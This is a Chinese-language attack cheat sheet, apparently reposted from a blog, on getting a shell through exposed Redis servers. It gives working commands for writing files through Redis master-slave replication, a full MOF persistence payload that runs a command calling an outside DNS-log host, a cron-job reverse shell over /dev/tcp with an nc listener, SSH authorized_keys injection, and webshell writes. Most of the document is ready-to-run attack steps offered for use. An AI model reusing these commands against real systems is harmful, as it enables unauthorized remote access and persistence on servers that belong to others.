redis getshell

一、Windows

1、Redis主从同步写数据

工具下载地址:

执行如下命令:
python2 RedisWriteFile.py --rhost=目标ip --rport=目标端口 --lhost=本机ip --lport=本机端口 --rpath="目标路径" --rfile="目标文件名" --lfile="本机文件名"（目标机和本机能通信）

2、getshell的方式

1、写入webshell
2、写入用户启动项
C:\Users\administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
还需要用户的重启
3、劫持(高权限)
系统DLL劫持
重写C:\windows\system32\setch.exe粘贴键(需要开放3389端口)
4、mof（针对03的机器）
写入以下文件:C:/windows/system32/wbem/mof/nullevt.mof
内容如下:
#pragma namespace("\\\\.\\root\\subscription") 
instance of __EventFilter as $EventFilter 
{ 
    EventNamespace = "Root\\Cimv2"; 
    Name  = "filtP2"; 
    Query = "Select * From __InstanceModificationEvent " 
            "Where TargetInstance Isa \"Win32_LocalTime\" " 
            "And TargetInstance.Second = 5"; 
    QueryLanguage = "WQL"; 
}; 
instance of ActiveScriptEventConsumer as $Consumer 
{ 
    Name = "consPCSV2"; 
    ScriptingEngine = "JScript"; 
    ScriptText = 
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"ping sfas.g9bubn.ceye.io \")"; 
}; 
instance of __FilterToConsumerBinding 
{ 
    Consumer   = $Consumer; 
    Filter = $EventFilter; 
};

二、Linux

a、crontabl--计划任务

在服务上监听

nc -lvvp 8888

在redis上执行

root@kali:~# redis-cli -h 192.168.63.130
	192.168.63.130:6379> set  xx   "\n* * * * * bash -i >& /dev/tcp/监听的ip/8888 0>&1\n"
	OK
	192.168.63.130:6379> config set dir /var/spool/cron/
	OK
	192.168.63.130:6379> config set dbfilename root
	OK
	192.168.63.130:6379> save

b、通过SSH key的方式进行getshell

生成私钥对
ssh-key -t rsa

将id_rsa.pub写入缓冲
(echo -e "\n";cat id_rsa.pub;echo -e "\n")>key.txt#这样做的目的是前后用\n换行，避免和redis里其他缓存数据混合。
cat key.txt |redis-cli -h 192.168.0.114 -x set crack

连接目标redis
redis-cli -h 192.168.0.114

通过redis执行如下命令
config set dir /root/.ssh
config set dbfilename authorized_keys
save

c、写入webshell

config set dir /home/kali/Desktop
config set dbfilename shell.php
set 1 ""
save

原文：https://www.cnblogs.com/sakura521/p/14969440.html